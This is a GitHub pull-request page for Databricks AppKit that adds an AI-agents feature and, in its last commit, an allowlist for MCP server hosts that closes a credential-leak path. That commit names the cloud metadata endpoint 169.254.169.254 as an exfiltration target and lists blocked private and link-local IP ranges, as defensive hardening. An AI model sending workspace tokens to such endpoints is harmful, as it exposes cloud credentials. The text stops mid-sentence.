feat(appkit): zero-trust MCP host policy with URL allowlist and scoped auth #307
Closed
MarioCadenas wants to merge 6 commits into agent/v2/6-apps-docs
Second layer of the agents feature. Adds the primitives for defining
agent tools and implements them on every core ToolProvider plugin.
### User-facing factories
- `tool(config)` — inline function tools backed by a Zod schema. Auto-
generates JSON Schema for the LLM via `z.toJSONSchema()` (stripping
the top-level `$schema` annotation that Gemini rejects), runtime-
validates tool-call arguments, returns an LLM-friendly error string
on validation failure so the model can self-correct.
- `mcpServer(name, url)` — tiny factory for hosted custom MCP server
configs. Replaces the verbose
`{ type: "custom_mcp_server", custom_mcp_server: { app_name, app_url } }`
wrapper.
- `FunctionTool` / `HostedTool` types + `isFunctionTool` / `isHostedTool`
type guards. `HostedTool` is a union of Genie, VectorSearch, custom
MCP, and external-connection configs.
- `ToolkitEntry` + `ToolkitOptions` types + `isToolkitEntry` guard.
`AgentTool = FunctionTool | HostedTool | ToolkitEntry` is the canonical
union later PRs spread into agent definitions.
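A minimal sketch of how the `mcpServer(name, url)` factory and the type guards could fit together. The type shapes here are assumptions inferred from the wrapper quoted above (in particular the `type: "function"` discriminant and the `execute` field are hypothetical), not the package's actual definitions.

```ts
// Hypothetical shapes for illustration; the real types live in appkit.
interface CustomMcpServerTool {
  type: "custom_mcp_server";
  custom_mcp_server: { app_name: string; app_url: string };
}

interface SketchFunctionTool {
  type: "function"; // assumed discriminant
  name: string;
  execute: (args: unknown) => string;
}

type SketchTool = CustomMcpServerTool | SketchFunctionTool;

// Builds the verbose hosted-tool wrapper from a name and a URL.
function mcpServer(name: string, url: string): CustomMcpServerTool {
  return {
    type: "custom_mcp_server",
    custom_mcp_server: { app_name: name, app_url: url },
  };
}

// Type guards narrow the union by its discriminant.
function isFunctionTool(t: SketchTool): t is SketchFunctionTool {
  return t.type === "function";
}

function isHostedTool(t: SketchTool): t is CustomMcpServerTool {
  return t.type === "custom_mcp_server";
}

const hosted: SketchTool = mcpServer("vector-search", "https://example.invalid/mcp");
```

With the guards in place, downstream code can branch on `isHostedTool(hosted)` without inspecting the wrapper's nested fields.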
### Internal registry + JSON Schema helper
- `defineTool(config)` + `ToolRegistry` — plugin authors' internal shape
for declaring a keyed set of tools with Zod-typed handlers.
- `toolsFromRegistry()` — produces the `AgentToolDefinition[]` exposed
via `ToolProvider.getAgentTools()`.
- `executeFromRegistry()` — validates args then dispatches to the
handler. Returns LLM-friendly errors on bad args.
- `toToolJSONSchema()` — shared helper at
`packages/appkit/src/plugins/agents/tools/json-schema.ts` that wraps
`toJSONSchema()` and strips `$schema`. Used by `tool()`,
`toolsFromRegistry()`, and `buildToolkitEntries()`.
- `buildToolkitEntries(pluginName, registry, opts?)` — converts a
plugin's internal `ToolRegistry` into a keyed record of `ToolkitEntry`
markers, honoring `prefix` / `only` / `except` / `rename`.
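The `$schema` stripping described for `toToolJSONSchema()` can be sketched as below. This is an illustration only: it works on an already-generated schema object and does not call Zod, and `stripTopLevelSchema` is a hypothetical name rather than the helper's real implementation.

```ts
type JsonSchema = Record<string, unknown>;

// Returns a shallow copy of the schema without the top-level `$schema` key.
// Nested keys are left untouched and the input object is not mutated.
function stripTopLevelSchema(schema: JsonSchema): JsonSchema {
  const copy: JsonSchema = { ...schema };
  delete copy["$schema"];
  return copy;
}

// Example input, shaped like the output of a JSON Schema generator.
const generated: JsonSchema = {
  $schema: "https://json-schema.org/draft/2020-12/schema",
  type: "object",
  properties: { city: { type: "string" } },
  required: ["city"],
};

const forLlm = stripTopLevelSchema(generated);
```

Copying before deleting keeps the generated schema reusable by callers that still want the annotation.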
### MCP client
- `AppKitMcpClient` — minimal JSON-RPC 2.0 client over SSE, zero deps.
Handles auth refresh, per-server connection pooling, and tool
definition aggregation.
- `resolveHostedTools()` — maps `HostedTool` configs to Databricks MCP
endpoint URLs.
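For readers unfamiliar with the wire format, here is a rough sketch of a JSON-RPC 2.0 request envelope and of pulling JSON payloads out of a server-sent-events body. How `AppKitMcpClient` actually frames and parses messages is not shown in this PR, so `rpcRequest` and `parseSseData` are hypothetical helpers.

```ts
interface JsonRpcRequest {
  jsonrpc: "2.0";
  id: number;
  method: string;
  params?: unknown;
}

let nextId = 1;

// Builds a JSON-RPC 2.0 request with a monotonically increasing id.
function rpcRequest(method: string, params?: unknown): JsonRpcRequest {
  const req: JsonRpcRequest = { jsonrpc: "2.0", id: nextId++, method };
  if (params !== undefined) req.params = params;
  return req;
}

// Extracts JSON payloads from a text/event-stream body. Events are separated
// by a blank line; the payload is carried on one or more `data:` lines.
function parseSseData(body: string): unknown[] {
  const out: unknown[] = [];
  for (const event of body.split(/\r?\n\r?\n/)) {
    const data = event
      .split(/\r?\n/)
      .filter((line) => line.startsWith("data:"))
      .map((line) => line.slice(5).replace(/^ /, "")) // drop "data:" and one optional space
      .join("\n");
    if (data.length > 0) out.push(JSON.parse(data));
  }
  return out;
}

const listReq = rpcRequest("tools/list");
const frames = parseSseData(
  'event: message\ndata: {"jsonrpc":"2.0","id":1,"result":{"tools":[]}}\n\n',
);
```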
### ToolProvider surfaces on core plugins
- **analytics** — `query` tool (Zod-typed, asUser dispatch)
- **files** — per-volume tool family: `${volumeKey}.{list,read,exists,metadata,upload,delete}` (dynamically named from the plugin's volume config)
- **genie** — per-space tool family: `${alias}.{sendMessage,getConversation}` (dynamically named from the plugin's spaces config)
- **lakebase** — `query` tool
Each plugin gains `getAgentTools()` + `executeAgentTool()` satisfying
the `ToolProvider` interface, plus a `.toolkit(opts?)` method that
returns a record of `ToolkitEntry` markers for later spread into agent
definitions.
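As an illustration of the `ToolProvider` surface and the dynamically named per-volume tool family, consider the sketch below. The interface signatures and the `SketchFilesProvider` class are assumptions made for the example; only the method names and the `${volumeKey}.<op>` naming come from the description above.

```ts
interface SketchToolDefinition {
  name: string;
  description: string;
}

// Assumed signatures; the real ToolProvider interface may differ.
interface SketchToolProvider {
  getAgentTools(): SketchToolDefinition[];
  executeAgentTool(name: string, args: unknown): Promise<unknown>;
}

const FILE_OPS = ["list", "read", "exists", "metadata", "upload", "delete"];

class SketchFilesProvider implements SketchToolProvider {
  private volumeKeys: string[];

  constructor(volumeKeys: string[]) {
    this.volumeKeys = volumeKeys;
  }

  // One tool per (volume, operation) pair, named `${volumeKey}.${op}`.
  getAgentTools(): SketchToolDefinition[] {
    const tools: SketchToolDefinition[] = [];
    for (const key of this.volumeKeys) {
      for (const op of FILE_OPS) {
        tools.push({ name: `${key}.${op}`, description: `${op} on volume "${key}"` });
      }
    }
    return tools;
  }

  // Placeholder dispatch: a real provider would call the volume API here.
  async executeAgentTool(name: string, _args: unknown): Promise<unknown> {
    const known = this.getAgentTools().some((t) => t.name === name);
    return known ? { ok: true, tool: name } : `Unknown tool "${name}"`;
  }
}

const filesProvider = new SketchFilesProvider(["uploads", "reports"]);
const fileToolNames = filesProvider.getAgentTools().map((t) => t.name);
```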
### Test plan
- 58 new tests across tool primitives + plugin ToolProvider surfaces
- Full appkit vitest suite: 1212 tests passing
- Typecheck clean
- Build clean, publint clean
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…nContext mediator
Third layer: the substrate every downstream PR relies on. No
user-facing API changes here; the surface for this PR is the mediator
pattern, lifecycle semantics, and factory stamping.
### Split Plugin construction from context binding
`Plugin` constructors become pure — no `CacheManager.getInstanceSync()`,
no `TelemetryManager.getProvider()`, no `PluginContext` wiring inside
`constructor()`. That work moves to a new lifecycle method:
```ts
interface BasePlugin {
attachContext?(deps: {
context?: unknown;
telemetryConfig?: TelemetryOptions;
}): void;
}
```
`createApp` calls `attachContext()` on every plugin after all
constructors have run, before `setup()`. This lets factories return
`PluginData` tuples at module scope without pulling core services into
the import graph — a prerequisite for later PRs that construct agent
definitions before `createApp`.
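The ordering described above (all constructors, then `attachContext()`, then `setup()`) can be sketched as follows. `createAppSketch` and `makePlugin` are hypothetical stand-ins that only record call order; they are not the real `createApp`.

```ts
interface SketchPlugin {
  name: string;
  attachContext?(deps: { context?: unknown }): void;
  setup(): void;
}

const callLog: string[] = [];

// Construction is pure: it records itself and touches no shared services.
function makePlugin(name: string): SketchPlugin {
  callLog.push(`construct:${name}`);
  return {
    name,
    attachContext() {
      callLog.push(`attach:${name}`);
    },
    setup() {
      callLog.push(`setup:${name}`);
    },
  };
}

function createAppSketch(factories: Array<() => SketchPlugin>): void {
  const plugins = factories.map((f) => f()); // 1. run every constructor
  const context = {};
  for (const p of plugins) p.attachContext?.({ context }); // 2. bind context
  for (const p of plugins) p.setup(); // 3. run setup
}

createAppSketch([() => makePlugin("analytics"), () => makePlugin("agents")]);
```

After the call, `callLog` lists both constructions first, then both attachments, then both setups, which is the property that lets factories run at module scope.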
### PluginContext mediator
`packages/appkit/src/core/plugin-context.ts` — new class that mediates
all inter-plugin communication:
- **Route buffering**: `addRoute()` / `addMiddleware()` buffer until
the server plugin calls `registerAsRouteTarget()`, then flush via
`addExtension()`. Eliminates plugin-ordering fragility.
- **ToolProvider registry**: `registerToolProvider(name, plugin)` +
live `getToolProviders()`. Typed discovery of tool-exposing plugins.
- **User-scoped tool execution**: `executeTool(req, pluginName,
localName, args, signal?)` resolves the provider, wraps in
`asUser(req)` for OBO, opens a telemetry span, applies a 30s
timeout, dispatches, returns.
- **Lifecycle hooks**: `onLifecycle('setup:complete' | 'server:ready'
| 'shutdown', cb)` + `emitLifecycle(event)`. Callback errors don't
block siblings.
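A compact sketch of two of the mediator behaviours listed above: buffering routes until a target registers, and isolating lifecycle callback errors from sibling callbacks. `SketchContext` is a simplified stand-in; returning a failure count from `emitLifecycle` is an assumption made so the example is observable.

```ts
type Route = { method: string; path: string };
type RouteTarget = { addExtension(route: Route): void };
type LifecycleEvent = "setup:complete" | "server:ready" | "shutdown";

class SketchContext {
  private buffered: Route[] = [];
  private target: RouteTarget | undefined;
  private hooks = new Map<LifecycleEvent, Array<() => void>>();

  // Forward immediately if a target exists, otherwise buffer.
  addRoute(route: Route): void {
    if (this.target) this.target.addExtension(route);
    else this.buffered.push(route);
  }

  // Flush everything buffered so far, in insertion order.
  registerAsRouteTarget(target: RouteTarget): void {
    this.target = target;
    for (const r of this.buffered) target.addExtension(r);
    this.buffered = [];
  }

  onLifecycle(event: LifecycleEvent, cb: () => void): void {
    const list = this.hooks.get(event) ?? [];
    list.push(cb);
    this.hooks.set(event, list);
  }

  // A throwing callback is counted but does not stop later callbacks.
  emitLifecycle(event: LifecycleEvent): number {
    let failures = 0;
    for (const cb of this.hooks.get(event) ?? []) {
      try {
        cb();
      } catch {
        failures++;
      }
    }
    return failures;
  }
}

const ctx = new SketchContext();
const mounted: string[] = [];
ctx.addRoute({ method: "POST", path: "/chat" }); // buffered: no target yet
ctx.registerAsRouteTarget({ addExtension: (r) => { mounted.push(r.path); } });
ctx.addRoute({ method: "GET", path: "/info" }); // forwarded immediately

const ran: string[] = [];
ctx.onLifecycle("shutdown", () => { throw new Error("boom"); });
ctx.onLifecycle("shutdown", () => { ran.push("second"); });
const failed = ctx.emitLifecycle("shutdown");
```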
### `toPlugin` stamps `pluginName`
`packages/appkit/src/plugin/to-plugin.ts` — the factory now attaches a
read-only `pluginName` property to the returned function. Later PRs'
`fromPlugin(factory)` reads it to identify which plugin a factory
refers to without needing to construct an instance. `NamedPluginFactory`
type exported for consumers who want to type-constrain factories.
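One way to stamp a read-only `pluginName` on a factory function is `Object.defineProperty`, sketched below. `stampName` and `NamedFactory` are hypothetical names for illustration; the actual `toPlugin` implementation and the `NamedPluginFactory` type are not reproduced here.

```ts
type NamedFactory<C, P> = ((config?: C) => P) & { readonly pluginName: string };

// Attaches a non-writable `pluginName` to the factory and returns it.
function stampName<C, P>(name: string, factory: (config?: C) => P): NamedFactory<C, P> {
  Object.defineProperty(factory, "pluginName", {
    value: name,
    writable: false,
    enumerable: true,
  });
  return factory as NamedFactory<C, P>;
}

const analyticsFactory = stampName("analytics", (config?: { warehouse?: string }) => ({
  kind: "analytics-instance",
  config,
}));

// The name is readable without constructing a plugin instance.
const stampedName = analyticsFactory.pluginName;
```

Because the property lives on the function itself, a consumer can identify the plugin before any constructor runs.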
### Server plugin defers start to `setup:complete`
`ServerPlugin.setup()` no longer calls `extendRoutes()` synchronously.
It subscribes to the `setup:complete` lifecycle event via
`PluginContext` and starts the HTTP server there. This ensures that
any deferred-phase plugin (agents plugin in a later PR) has had a
chance to register routes via `PluginContext.addRoute()` before the
server binds. Removes the `plugins` field from `ServerConfig` (routes
are now discovered via the context, not a config snapshot).
### Test plan
- 25 new PluginContext tests (route buffering, tool provider registry,
executeTool paths, lifecycle hooks, plugin metadata)
- Updated AppKit lifecycle tests to inject `context` instead of
`plugins`
- Full appkit vitest suite: 1237 tests passing
- Typecheck clean across all 8 workspace projects
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…agents
The main product layer. Turns an AppKit app into an AI-agent host with
markdown-driven agent discovery, code-defined agents, sub-agents, and
a standalone run-without-HTTP executor.
### `createAgent(def)` — pure factory
`packages/appkit/src/core/create-agent-def.ts`. Returns the passed-in
definition after cycle-detecting the sub-agent graph. No adapter
construction, no side effects — safe at module top-level. The returned
`AgentDefinition` is plain data, consumable by either `agents({ agents
})` or `runAgent(def, input)`.
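Cycle detection over the sub-agent graph could look like the depth-first walk below. This is a sketch under assumptions: `SketchAgentDef` keeps only the fields needed for the example, and the error message is invented.

```ts
interface SketchAgentDef {
  instructions: string;
  agents?: Record<string, SketchAgentDef>;
}

// Depth-first walk that fails if a definition appears on its own ancestor
// path. Sharing one sub-agent between two parents is allowed.
function assertAcyclic(def: SketchAgentDef, path: SketchAgentDef[] = []): void {
  if (path.includes(def)) {
    throw new Error("Sub-agent cycle detected");
  }
  for (const child of Object.values(def.agents ?? {})) {
    assertAcyclic(child, [...path, def]);
  }
}

// Pure factory: validates, then hands the same plain object back.
function createAgentSketch(def: SketchAgentDef): SketchAgentDef {
  assertAcyclic(def);
  return def;
}

const leaf: SketchAgentDef = { instructions: "Summarize." };
const root = createAgentSketch({
  instructions: "Route requests.",
  agents: { summarizer: leaf, backup: leaf },
});
```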
### `agents()` plugin
`packages/appkit/src/plugins/agents/agents.ts`. `AgentsPlugin` class:
- Loads markdown agents from `config/agents/*.md` (configurable dir)
via real YAML frontmatter parsing (`js-yaml`). Frontmatter schema:
`endpoint`, `model`, `toolkits`, `tools`, `default`, `maxSteps`,
`maxTokens`, `baseSystemPrompt`. Unknown keys logged, invalid YAML
throws at boot.
- Merges code-defined agents passed via `agents({ agents: { name: def
} })`. Code wins on key collision.
- For each agent, builds a per-agent tool index from:
1. Sub-agents (`agents: {...}`) — synthesized as `agent-<key>`
tools on the parent.
2. Explicit tool record entries — `ToolkitEntry`s, inline
`FunctionTool`s, or `HostedTool`s.
3. Auto-inherit (if nothing explicit) — pulls every registered
`ToolProvider` plugin's tools. Asymmetric default: markdown
agents inherit (`file: true`), code-defined agents don't (`code:
false`).
- Mounts `POST /invocations` (OpenAI Responses compatible) + `POST
/chat`, `POST /cancel`, `GET /threads/:id`, `DELETE /threads/:id`,
`GET /info`.
- SSE streaming via `executeStream`. Tool calls dispatch through
`PluginContext.executeTool(req, pluginName, localName, args, signal)`
for OBO, telemetry, and timeout.
- Exposes `appkit.agent.{register, list, get, reload, getDefault,
getThreads}` runtime helpers.
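The per-agent tool index and the asymmetric auto-inherit default can be approximated as follows. This sketch reduces tools to their names, and it assumes that sub-agents alone do not count as "explicit" tools; the source does not say either way.

```ts
type Origin = "file" | "code";

interface SketchAgent {
  origin: Origin;
  tools?: Record<string, unknown>;
  agents?: Record<string, unknown>;
}

// Markdown ("file") agents inherit by default, code-defined agents do not.
const AUTO_INHERIT_DEFAULT: Record<Origin, boolean> = { file: true, code: false };

function buildToolNames(agent: SketchAgent, providerTools: string[]): string[] {
  const names: string[] = [];
  // 1. Sub-agents become `agent-<key>` tools on the parent.
  for (const key of Object.keys(agent.agents ?? {})) names.push(`agent-${key}`);
  // 2. Explicit tool record entries.
  const explicit = Object.keys(agent.tools ?? {});
  names.push(...explicit);
  // 3. Auto-inherit only when nothing explicit was declared (assumption:
  //    sub-agents do not suppress it).
  if (explicit.length === 0 && AUTO_INHERIT_DEFAULT[agent.origin]) {
    names.push(...providerTools);
  }
  return names;
}

const registered = ["analytics.query", "lakebase.query"];
const markdownTools = buildToolNames({ origin: "file" }, registered);
const codeTools = buildToolNames({ origin: "code", agents: { researcher: {} } }, registered);
```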
### `runAgent(def, input)` — standalone executor
`packages/appkit/src/core/run-agent.ts`. Runs an `AgentDefinition`
without `createApp` or HTTP. Drives the adapter's event stream to
completion, executing inline tools + sub-agents along the way.
Aggregates events into `{ text, events }`. Useful for tests, CLI
scripts, and offline pipelines. Hosted/MCP tools and plugin toolkits
require the agents plugin and throw clear errors with guidance.
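Draining an event stream into `{ text, events }` can be sketched with an async iterator. The event shapes and the `fakeAdapter` generator are hypothetical; the real `AgentEvent` union is not shown in this PR.

```ts
// Hypothetical event union for illustration only.
type SketchEvent =
  | { type: "text_delta"; delta: string }
  | { type: "tool_call"; name: string }
  | { type: "done" };

// Stand-in for an adapter's event stream.
async function* fakeAdapter(): AsyncGenerator<SketchEvent> {
  yield { type: "text_delta", delta: "Hello, " };
  yield { type: "tool_call", name: "get_weather" };
  yield { type: "text_delta", delta: "world." };
  yield { type: "done" };
}

// Consumes the stream to completion, keeping every event and
// concatenating the text deltas.
async function drain(
  stream: AsyncIterable<SketchEvent>,
): Promise<{ text: string; events: SketchEvent[] }> {
  let text = "";
  const events: SketchEvent[] = [];
  for await (const ev of stream) {
    events.push(ev);
    if (ev.type === "text_delta") text += ev.delta;
  }
  return { text, events };
}

const pendingResult = drain(fakeAdapter());
```

A test or CLI script would then `await` the returned promise and assert on `text` while still having the raw `events` for debugging.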
### Event translation and thread storage
- `AgentEventTranslator` — stateful converter from internal
`AgentEvent`s to OpenAI Responses API `ResponseStreamEvent`s with
sequence numbers and output indices.
- `InMemoryThreadStore` — per-user conversation persistence. Nested
`Map<userId, Map<threadId, Thread>>`. Implements `ThreadStore` from
shared types.
- `buildBaseSystemPrompt` + `composeSystemPrompt` — formats the
AppKit base prompt (with plugin names and tool names) and layers
the agent's instructions on top.
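The nested-map layout behind per-user thread storage can be illustrated like this. Method names and the `SketchThread` shape are assumptions; the real `ThreadStore` interface lives in the shared types and may differ.

```ts
interface SketchThread {
  id: string;
  messages: string[];
}

class SketchThreadStore {
  // userId -> (threadId -> thread)
  private byUser = new Map<string, Map<string, SketchThread>>();

  save(userId: string, thread: SketchThread): void {
    let threads = this.byUser.get(userId);
    if (!threads) {
      threads = new Map();
      this.byUser.set(userId, threads);
    }
    threads.set(thread.id, thread);
  }

  get(userId: string, threadId: string): SketchThread | undefined {
    return this.byUser.get(userId)?.get(threadId);
  }

  delete(userId: string, threadId: string): boolean {
    return this.byUser.get(userId)?.delete(threadId) ?? false;
  }
}

const store = new SketchThreadStore();
store.save("alice", { id: "t1", messages: ["hi"] });
```

Keying the outer map by user means a lookup with another user's id cannot reach the thread, even if the thread id is guessed.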
### Frontmatter loader
`load-agents.ts` — reads `*.md` files, parses YAML frontmatter with
`js-yaml`, resolves `toolkits: [...]` entries against the plugin
provider index at load time, wraps ambient tools (from `agents({
tools: {...} })`) for `tools: [...]` frontmatter references.
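Before the YAML is parsed, the frontmatter has to be separated from the markdown body. The sketch below shows only that split and deliberately leaves the YAML text unparsed (the loader described above hands it to `js-yaml`). `splitFrontmatter` is a hypothetical helper, not the function in `load-agents.ts`.

```ts
// Splits "---\n<yaml>\n---\n<body>" into its two parts. Files without a
// leading frontmatter fence are treated as body only.
function splitFrontmatter(source: string): { frontmatter: string; body: string } {
  const match = /^---\r?\n([\s\S]*?)\r?\n---\r?\n?([\s\S]*)$/.exec(source);
  if (!match) return { frontmatter: "", body: source };
  return { frontmatter: match[1] ?? "", body: match[2] ?? "" };
}

const agentFile = [
  "---",
  "default: true",
  "toolkits:",
  "  - analytics",
  "---",
  "You are a helpful assistant.",
  "",
].join("\n");

const parts = splitFrontmatter(agentFile);
```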
### Plumbing
- Adds `js-yaml` + `@types/js-yaml` deps.
- Manifest mounts routes at `/api/agent/*` (singular — matches
`appkit.agent.*` runtime handle).
- Exports from the main barrel: `agents`, `createAgent`, `runAgent`,
`AgentDefinition`, `AgentsPluginConfig`, `AgentTool`, `ToolkitEntry`,
`ToolkitOptions`, `BaseSystemPromptOption`, `PromptContext`,
`isToolkitEntry`, `loadAgentFromFile`, `loadAgentsFromDir`.
### Test plan
- 60 new tests: agents plugin lifecycle, markdown loading, code-agent
registration, auto-inherit asymmetry, sub-agent tool synthesis,
cycle detection, event translator, thread store, system prompt
composition, standalone `runAgent`.
- Full appkit vitest suite: 1297 tests passing.
- Typecheck clean across all 8 workspace projects.
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…esolver
DX centerpiece. Introduces the symbol-marker pattern that collapses
plugin tool references in code-defined agents from a three-touch dance
to a single line, and extracts the shared resolver that the agents
plugin, auto-inherit, and standalone runAgent all now go through.
### `fromPlugin(factory, opts?)` — the marker
`packages/appkit/src/plugins/agents/from-plugin.ts`. Returns a
spread-friendly `{ [Symbol()]: FromPluginMarker }` record. The symbol key is
freshly generated per call, so multiple spreads of the same plugin
coexist safely. The marker's brand is a globally-interned
`Symbol.for("@databricks/appkit.fromPluginMarker")` — stable across
module boundaries.
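The symbol-marker pattern can be sketched as below. The `Symbol.for` key string is taken from the description above; the marker's field names (`brand`, `pluginName`) and the function names are assumptions made for the example.

```ts
// Globally interned brand: the same symbol in every module that asks for it.
const MARKER_BRAND = Symbol.for("@databricks/appkit.fromPluginMarker");

interface SketchMarker {
  brand: symbol; // assumed field name
  pluginName: string;
}

// Returns a one-entry record under a fresh, unique symbol key, so several
// spreads of the same plugin never overwrite each other.
function fromPluginSketch(factory: { pluginName: string }): Record<symbol, SketchMarker> {
  const key = Symbol(`fromPlugin:${factory.pluginName}`);
  return { [key]: { brand: MARKER_BRAND, pluginName: factory.pluginName } };
}

function isMarker(value: unknown): value is SketchMarker {
  return (
    typeof value === "object" &&
    value !== null &&
    (value as { brand?: unknown }).brand === MARKER_BRAND
  );
}

const analyticsRef = { pluginName: "analytics" };
const markerTools = {
  ...fromPluginSketch(analyticsRef),
  ...fromPluginSketch(analyticsRef),
};
const markerKeys = Object.getOwnPropertySymbols(markerTools);
```

Both spreads survive in `markerTools` because each call minted its own key, while the shared brand still lets a resolver recognize every entry.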
### `resolveToolkitFromProvider(pluginName, provider, opts?)`
`packages/appkit/src/plugins/agents/toolkit-resolver.ts`. Single source
of truth for "turn a ToolProvider into a keyed record of `ToolkitEntry`
markers". Prefers `provider.toolkit(opts)` when available (core plugins
implement it), falls back to walking `getAgentTools()` and synthesizing
namespaced keys (`${pluginName}.${localName}`) for third-party
providers, honoring `only` / `except` / `rename` / `prefix` the same
way.
Used by three call sites, previously all copy-pasted:
1. `AgentsPlugin.buildToolIndex` — fromPlugin marker resolution pass
2. `AgentsPlugin.applyAutoInherit` — markdown auto-inherit path
3. `runAgent` — standalone-mode plugin tool dispatch
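The fallback path for third-party providers (walk the tool names, synthesize namespaced keys, apply the options) might look roughly like this. The precise semantics of `prefix` and `rename` are not spelled out in this PR, so the behaviour below is an assumption: `prefix` replaces the default `${pluginName}.` namespace, and `rename` maps a local name to a complete key.

```ts
interface SketchToolkitOptions {
  prefix?: string;
  only?: string[];
  except?: string[];
  rename?: Record<string, string>;
}

// Maps each surviving local tool name to the key it is exposed under.
function resolveKeys(
  pluginName: string,
  localNames: string[],
  opts: SketchToolkitOptions = {},
): Record<string, string> {
  const prefix = opts.prefix ?? `${pluginName}.`; // assumed default namespace
  const out: Record<string, string> = {};
  for (const local of localNames) {
    if (opts.only && !opts.only.includes(local)) continue;
    if (opts.except?.includes(local)) continue;
    const key = opts.rename?.[local] ?? `${prefix}${local}`; // assumed precedence
    out[key] = local;
  }
  return out;
}

const defaultKeys = resolveKeys("lakebase", ["query", "explain"]);
const filteredKeys = resolveKeys("lakebase", ["query", "explain"], {
  except: ["explain"],
  rename: { query: "sql" },
});
```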
### `AgentsPlugin.buildToolIndex` — symbol-key resolution pass
Before the existing string-key iteration, `buildToolIndex` now walks
`Object.getOwnPropertySymbols(def.tools)`. For each `FromPluginMarker`,
it looks up the plugin by name in `PluginContext.getToolProviders()`,
calls `resolveToolkitFromProvider`, and merges the resulting entries
into the per-agent index. Missing plugins throw at setup time with a
clear `Available: ...` listing — wiring errors surface on boot, not
mid-request.
`hasExplicitTools` now counts symbol keys too, so a
`tools: { ...fromPlugin(x) }` record correctly disables auto-inherit
on code-defined agents.
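Why symbol keys need separate counting: `Object.keys` ignores them, so a record holding only marker spreads looks empty to a string-key check. A minimal sketch of the corrected test, with a simplified signature:

```ts
// Counts both string keys and symbol keys, so a tools record that only
// contains marker spreads still registers as explicit.
function hasExplicitTools(tools: object | undefined): boolean {
  if (!tools) return false;
  return (
    Object.keys(tools).length > 0 ||
    Object.getOwnPropertySymbols(tools).length > 0
  );
}

// A record shaped like `{ ...fromPlugin(x) }`: one symbol key, no string keys.
const markerOnly = { [Symbol("fromPlugin")]: { pluginName: "analytics" } };
const stringKeyCount = Object.keys(markerOnly).length;
const markerOnlyIsExplicit = hasExplicitTools(markerOnly);
```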
### Type plumbing
- `AgentTools` type: `{ [key: string]: AgentTool } & { [key: symbol]:
FromPluginMarker }`. Preserves string-key autocomplete while
accepting marker spreads under strict TS.
- `AgentDefinition.tools` switched to `AgentTools`.
### `runAgent` gains `plugins?: PluginData[]`
`packages/appkit/src/core/run-agent.ts`. When an agent def contains
`fromPlugin` markers, the caller passes plugins via
`RunAgentInput.plugins`. A local provider cache constructs each plugin
and dispatches tool calls via `provider.executeAgentTool()`. Runs as
service principal (no OBO — there's no HTTP request). If a def
contains markers but `plugins` is absent, throws with guidance.
### Exports
`fromPlugin`, `FromPluginMarker`, `isFromPluginMarker`, `AgentTools`
added to the main barrel.
### Test plan
- 14 new tests: marker shape, symbol uniqueness, type guard,
factory-without-pluginName error, fromPlugin marker resolution in
AgentsPlugin, fallback to getAgentTools for providers without
.toolkit(), symbol-only tools disables auto-inherit, runAgent
standalone marker resolution via `plugins` arg, guidance error when
missing.
- Full appkit vitest suite: 1311 tests passing.
- Typecheck clean.
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…template
Final layer of the agents feature stack. Everything needed to
exercise, demonstrate, and learn the feature.
### Reference application: agent-app
`apps/agent-app/` — a standalone app purpose-built around the agents
feature. Ships with:
- `server.ts` — full example of code-defined agents via `fromPlugin`:
```ts
const support = createAgent({
instructions: "…",
tools: {
...fromPlugin(analytics),
...fromPlugin(files),
get_weather,
"mcp.vector-search": mcpServer("vector-search", "https://…"),
},
});
await createApp({
plugins: [server({ port }), analytics(), files(), agents({ agents: { support } })],
});
```
- `config/agents/assistant.md` — markdown-driven agent alongside the
code-defined one, showing the asymmetric auto-inherit default.
- Vite + React 19 + TailwindCSS frontend with a chat UI.
- Databricks deployment config (`databricks.yml`, `app.yaml`) and
deploy scripts.
### dev-playground chat UI + demo agent
`apps/dev-playground/client/src/routes/agent.route.tsx` — chat UI with
inline autocomplete (hits the `autocomplete` markdown agent) and a
full threaded conversation panel (hits the default agent).
`apps/dev-playground/server/index.ts` — adds a code-defined `helper`
agent using `fromPlugin(analytics)` alongside the markdown-driven
`autocomplete` agent in `config/agents/`. Exercises the mixed-style
setup (markdown + code) against the same plugin list.
`apps/dev-playground/config/agents/*.md` — both agents defined with
valid YAML frontmatter.
### Docs
`docs/docs/plugins/agents.md` — progressive five-level guide:
1. Drop a markdown file → it just works.
2. Scope tools via `toolkits:` / `tools:` frontmatter.
3. Code-defined agents with `fromPlugin()`.
4. Sub-agents.
5. Standalone `runAgent()` (no `createApp` or HTTP).
Plus a configuration reference, runtime API reference, and frontmatter
schema table.
`docs/docs/api/appkit/` — regenerated typedoc for the new public
surface (fromPlugin, runAgent, AgentDefinition, AgentsPluginConfig,
ToolkitEntry, ToolkitOptions, all adapter types, and the agents
plugin factory).
### Template
`template/appkit.plugins.json` — adds the `agent` plugin entry so
`npx @databricks/appkit init --features agent` scaffolds the plugin
correctly.
### Test plan
- Full appkit vitest suite: 1311 tests passing
- Typecheck clean across all 8 workspace projects
- `pnpm docs:build` clean (no broken links)
- `pnpm --filter=@databricks/appkit build:package` clean, publint
clean
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…d auth
Closes the MCP-URL token-exfiltration surface identified in the agents
stack review. Before this change, `AppKitMcpClient` accepted any
`http(s)://` URL as a hosted tool endpoint and forwarded the
service-principal token (on `initialize`/`tools/list`) plus the end-user
OBO token (on `tools/call`) to whatever host the developer wrote into
`mcpServer(name, url)`. A compromised or mistyped URL, or one pointed at
`http://169.254.169.254/latest/meta-data/`, would leak workspace
credentials on connect, with no user interaction required.
### Policy surface
New `mcp` field on `AgentsPluginConfig`:
```ts
agents({
  mcp: {
    trustedHosts: ["mcp.corp.internal"],
    allowLocalhost: true, // default: NODE_ENV !== "production"
  },
});
```
By default only same-origin Databricks workspace URLs are reachable.
Workspace credentials (SP or OBO) are *never* forwarded to non-workspace
hosts; trusted external MCP servers must authenticate themselves.
### Gates enforced at connect()
1. Only `http(s):` schemes.
2. `http://` refused for everything except localhost in dev mode.
3. Hostname must match workspace, equal localhost (if permitted), or be
   in `trustedHosts`.
4. Resolved DNS addresses must not land in loopback, RFC1918, CGNAT,
   link-local (blocks cloud metadata 169.254.169.254), ULA, or multicast
   ranges. IP-literal URLs in these ranges are rejected without a DNS
   lookup. Malformed IPs fail-closed.
### Auth scoping
`AppKitMcpClient.callTool` drops any caller-supplied `Authorization`
header when the destination's `forwardWorkspaceAuth` was `false` at
connect time. `sendRpc` / `sendNotification` never invoke the workspace
